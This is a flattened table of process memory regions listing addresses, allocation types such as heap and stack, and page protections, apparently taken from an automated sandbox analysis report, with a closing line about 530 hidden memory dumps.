|
2006D7A8000
|
heap
|
page read and write
|
||
|
1F12F690000
|
heap
|
page execute and read and write
|
||
|
2CF42F7A000
|
heap
|
page read and write
|
||
|
7FF848586000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CF40F9A000
|
heap
|
page read and write
|
||
|
7FF8486A0000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E7F000
|
heap
|
page read and write
|
||
|
1F147AD0000
|
heap
|
page read and write
|
||
|
1FC60BD9000
|
heap
|
page read and write
|
||
|
200016FA000
|
trusted library allocation
|
page read and write
|
||
|
2006D072000
|
trusted library allocation
|
page read and write
|
||
|
2006D6E8000
|
heap
|
page read and write
|
||
|
7FF8486A0000
|
trusted library allocation
|
page read and write
|
||
|
1FC486F6000
|
heap
|
page read and write
|
||
|
2006D030000
|
heap
|
page execute and read and write
|
||
|
2000042B000
|
trusted library allocation
|
page read and write
|
||
|
1F13F742000
|
trusted library allocation
|
page read and write
|
||
|
7FF848850000
|
trusted library allocation
|
page read and write
|
||
|
1F12FB7A000
|
trusted library allocation
|
page read and write
|
||
|
7FF8486E0000
|
trusted library allocation
|
page read and write
|
||
|
2006B63A000
|
heap
|
page read and write
|
||
|
2CF42F84000
|
heap
|
page read and write
|
||
|
1FC48C35000
|
trusted library allocation
|
page read and write
|
||
|
1F12F7E1000
|
trusted library allocation
|
page read and write
|
||
|
1F12D810000
|
heap
|
page read and write
|
||
|
2F9C000
|
stack
|
page read and write
|
||
|
25B76E000
|
stack
|
page read and write
|
||
|
2CF42F73000
|
heap
|
page read and write
|
||
|
2CF42E02000
|
heap
|
page read and write
|
||
|
2006CFC0000
|
trusted library allocation
|
page read and write
|
||
|
2006B7D0000
|
heap
|
page read and write
|
||
|
1FC46CE3000
|
heap
|
page read and write
|
||
|
2CF42E73000
|
heap
|
page read and write
|
||
|
7FF848672000
|
trusted library allocation
|
page read and write
|
||
|
7FF848690000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FC46B70000
|
heap
|
page read and write
|
||
|
7FF848682000
|
trusted library allocation
|
page read and write
|
||
|
200003FF000
|
trusted library allocation
|
page read and write
|
||
|
2006D70A000
|
heap
|
page read and write
|
||
|
2006B5B0000
|
heap
|
page read and write
|
||
|
7FF8486D0000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E96000
|
heap
|
page read and write
|
||
|
1F147950000
|
heap
|
page execute and read and write
|
||
|
2006D777000
|
heap
|
page read and write
|
||
|
2006D184000
|
heap
|
page read and write
|
||
|
2000053E000
|
trusted library allocation
|
page read and write
|
||
|
2CF40FF9000
|
heap
|
page read and write
|
||
|
20001C33000
|
trusted library allocation
|
page read and write
|
||
|
7FF848760000
|
trusted library allocation
|
page read and write
|
||
|
25BB7E000
|
stack
|
page read and write
|
||
|
986697E000
|
stack
|
page read and write
|
||
|
200003E6000
|
trusted library allocation
|
page read and write
|
||
|
7FF848710000
|
trusted library allocation
|
page read and write
|
||
|
25B6E2000
|
stack
|
page read and write
|
||
|
2CF410A0000
|
heap
|
page read and write
|
||
|
98679CE000
|
stack
|
page read and write
|
||
|
7FF8487C0000
|
trusted library allocation
|
page read and write
|
||
|
2006B804000
|
heap
|
page read and write
|
||
|
1090000
|
heap
|
page read and write
|
||
|
7FF848556000
|
trusted library allocation
|
page read and write
|
||
|
1F12F6D1000
|
trusted library allocation
|
page read and write
|
||
|
1F14788F000
|
heap
|
page read and write
|
||
|
1FC58C21000
|
trusted library allocation
|
page read and write
|
||
|
7FF8484B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8487A0000
|
trusted library allocation
|
page read and write
|
||
|
25C0BB000
|
stack
|
page read and write
|
||
|
1FC58BB1000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E4B000
|
heap
|
page read and write
|
||
|
1FC60D50000
|
heap
|
page read and write
|
||
|
7DD08FF000
|
stack
|
page read and write
|
||
|
1F12F1B0000
|
trusted library allocation
|
page read and write
|
||
|
7DD05AE000
|
stack
|
page read and write
|
||
|
20000F3E000
|
trusted library allocation
|
page read and write
|
||
|
1F12FD64000
|
trusted library allocation
|
page read and write
|
||
|
7FF848760000
|
trusted library allocation
|
page read and write
|
||
|
7FF848770000
|
trusted library allocation
|
page read and write
|
||
|
DDB000
|
stack
|
page read and write
|
||
|
11A0000
|
heap
|
page read and write
|
||
|
7FF8484A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CF40F9B000
|
heap
|
page read and write
|
||
|
9866EFE000
|
stack
|
page read and write
|
||
|
98668FE000
|
stack
|
page read and write
|
||
|
7FF848556000
|
trusted library allocation
|
page read and write
|
||
|
1FC485D0000
|
heap
|
page readonly
|
||
|
2CF42DF1000
|
heap
|
page read and write
|
||
|
986687E000
|
stack
|
page read and write
|
||
|
1FC60E90000
|
heap
|
page read and write
|
||
|
1FC60BF2000
|
heap
|
page read and write
|
||
|
20000403000
|
trusted library allocation
|
page read and write
|
||
|
1F12F275000
|
heap
|
page read and write
|
||
|
1F12F1D0000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E12000
|
heap
|
page read and write
|
||
|
25BC7E000
|
stack
|
page read and write
|
||
|
7FF8487B0000
|
trusted library allocation
|
page read and write
|
||
|
F737CFF000
|
stack
|
page read and write
|
||
|
1FC486F0000
|
heap
|
page read and write
|
||
|
7FF8486F0000
|
trusted library allocation
|
page read and write
|
||
|
2006B5B9000
|
heap
|
page read and write
|
||
|
1FC48CB3000
|
trusted library allocation
|
page read and write
|
||
|
7FF848720000
|
trusted library allocation
|
page read and write
|
||
|
37DE000
|
stack
|
page read and write
|
||
|
1FC46CB5000
|
heap
|
page read and write
|
||
|
25BF3E000
|
stack
|
page read and write
|
||
|
1FC48B80000
|
heap
|
page execute and read and write
|
||
|
7FF8484EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
CDC000
|
stack
|
page read and write
|
||
|
1F12FAB4000
|
trusted library allocation
|
page read and write
|
||
|
2CF40F9C000
|
heap
|
page read and write
|
||
|
20001CFD000
|
trusted library allocation
|
page read and write
|
||
|
1FC46D11000
|
heap
|
page read and write
|
||
|
20001706000
|
trusted library allocation
|
page read and write
|
||
|
2CF4305E000
|
heap
|
page read and write
|
||
|
1FC46D1D000
|
heap
|
page read and write
|
||
|
2000192C000
|
trusted library allocation
|
page read and write
|
||
|
1F147957000
|
heap
|
page execute and read and write
|
||
|
7FF84855C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FC46D59000
|
heap
|
page read and write
|
||
|
7FF8486F0000
|
trusted library allocation
|
page read and write
|
||
|
2CF410AA000
|
heap
|
page read and write
|
||
|
108E000
|
stack
|
page read and write
|
||
|
7FF848642000
|
trusted library allocation
|
page read and write
|
||
|
1FC48660000
|
heap
|
page execute and read and write
|
||
|
25BEB8000
|
stack
|
page read and write
|
||
|
2006D70C000
|
heap
|
page read and write
|
||
|
2CF42F86000
|
heap
|
page read and write
|
||
|
2CF42E7F000
|
heap
|
page read and write
|
||
|
2CF42E80000
|
heap
|
page read and write
|
||
|
1F12F828000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E07000
|
heap
|
page read and write
|
||
|
1FC60D70000
|
heap
|
page execute and read and write
|
||
|
7FF848680000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CF42E60000
|
heap
|
page read and write
|
||
|
7FF848492000
|
trusted library allocation
|
page read and write
|
||
|
7DD0D7E000
|
stack
|
page read and write
|
||
|
2CF410A0000
|
heap
|
page read and write
|
||
|
1F12D815000
|
heap
|
page read and write
|
||
|
2CF40F60000
|
heap
|
page read and write
|
||
|
7DD087E000
|
stack
|
page read and write
|
||
|
7FF848630000
|
trusted library allocation
|
page read and write
|
||
|
2006D160000
|
heap
|
page execute and read and write
|
||
|
2CF42E1A000
|
heap
|
page read and write
|
||
|
7FF848493000
|
trusted library allocation
|
page execute and read and write
|
||
|
98665DE000
|
stack
|
page read and write
|
||
|
1FC60C96000
|
heap
|
page read and write
|
||
|
986794E000
|
stack
|
page read and write
|
||
|
7FF848651000
|
trusted library allocation
|
page read and write
|
||
|
1FC60BB8000
|
heap
|
page read and write
|
||
|
2CF40FA0000
|
heap
|
page read and write
|
||
|
7FF848550000
|
trusted library allocation
|
page read and write
|
||
|
7FF848720000
|
trusted library allocation
|
page read and write
|
||
|
2006D6A0000
|
heap
|
page execute and read and write
|
||
|
2CF42E7F000
|
heap
|
page read and write
|
||
|
9866CF9000
|
stack
|
page read and write
|
||
|
12C0000
|
heap
|
page read and write
|
||
|
1FC60DA0000
|
heap
|
page read and write
|
||
|
7FF848700000
|
trusted library allocation
|
page read and write
|
||
|
7FF848700000
|
trusted library allocation
|
page read and write
|
||
|
2CF40F9A000
|
heap
|
page read and write
|
||
|
7FF8487C0000
|
trusted library allocation
|
page read and write
|
||
|
1FC485C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848640000
|
trusted library allocation
|
page read and write
|
||
|
1FC58BC1000
|
trusted library allocation
|
page read and write
|
||
|
1F12F7E4000
|
trusted library allocation
|
page read and write
|
||
|
2E1B000
|
stack
|
page read and write
|
||
|
7FF848843000
|
trusted library allocation
|
page read and write
|
||
|
2CF410A5000
|
heap
|
page read and write
|
||
|
2CF410B0000
|
heap
|
page read and write
|
||
|
7FF848650000
|
trusted library allocation
|
page execute and read and write
|
||
|
20001CF9000
|
trusted library allocation
|
page read and write
|
||
|
1FC48CA3000
|
trusted library allocation
|
page read and write
|
||
|
1F12FBD6000
|
trusted library allocation
|
page read and write
|
||
|
379F000
|
stack
|
page read and write
|
||
|
7DD05EE000
|
stack
|
page read and write
|
||
|
1F12D827000
|
heap
|
page read and write
|
||
|
7FF848560000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F12F7F2000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E85000
|
heap
|
page read and write
|
||
|
2CF42E1F000
|
heap
|
page read and write
|
||
|
1F12F230000
|
heap
|
page execute and read and write
|
||
|
7FF848800000
|
trusted library allocation
|
page read and write
|
||
|
25BA7E000
|
stack
|
page read and write
|
||
|
20010001000
|
trusted library allocation
|
page read and write
|
||
|
2CF4102D000
|
heap
|
page read and write
|
||
|
2CF40F95000
|
heap
|
page read and write
|
||
|
1FC60E80000
|
heap
|
page read and write
|
||
|
2CF43001000
|
heap
|
page read and write
|
||
|
7FF8486F0000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E7F000
|
heap
|
page read and write
|
||
|
2CF410E8000
|
heap
|
page read and write
|
||
|
2CF42E3F000
|
heap
|
page read and write
|
||
|
7FF8484A2000
|
trusted library allocation
|
page read and write
|
||
|
2CF40F9A000
|
heap
|
page read and write
|
||
|
369E000
|
stack
|
page read and write
|
||
|
7FF8484B0000
|
trusted library allocation
|
page read and write
|
||
|
20001958000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E70000
|
heap
|
page read and write
|
||
|
7FF8486B0000
|
trusted library allocation
|
page read and write
|
||
|
2000172E000
|
trusted library allocation
|
page read and write
|
||
|
2CF42E57000
|
heap
|
page read and write
|
||
|
9866593000
|
stack
|
page read and write
|
||
|
309F000
|
stack
|
page read and write
|
||
|
2CF410DB000
|
heap
|
page read and write
|
||
|
2CF410E2000
|
heap
|
page read and write
|
||
|
2006D7D0000
|
heap
|
page read and write
|
||
|
F737FFE000
|
stack
|
page read and write
|
||
|
1040000
|
heap
|
page read and write
|
||
|
1F13F6E0000
|
trusted library allocation
|
page read and write
|
||
|
1F1477E0000
|
heap
|
page read and write
|
||
|
2006B5EC000
|
heap
|
page read and write
|
||
|
7FF8486A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8486C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8487D0000
|
trusted library allocation
|
page read and write
|
||
|
2006B5CF000
|
heap
|
page read and write
|
||
|
7FF848780000
|
trusted library allocation
|
page read and write
|
||
|
10C6000
|
heap
|
page read and write
|
||
|
2CF42E42000
|
heap
|
page read and write
|
There are 530 hidden memdumps, click here to show them.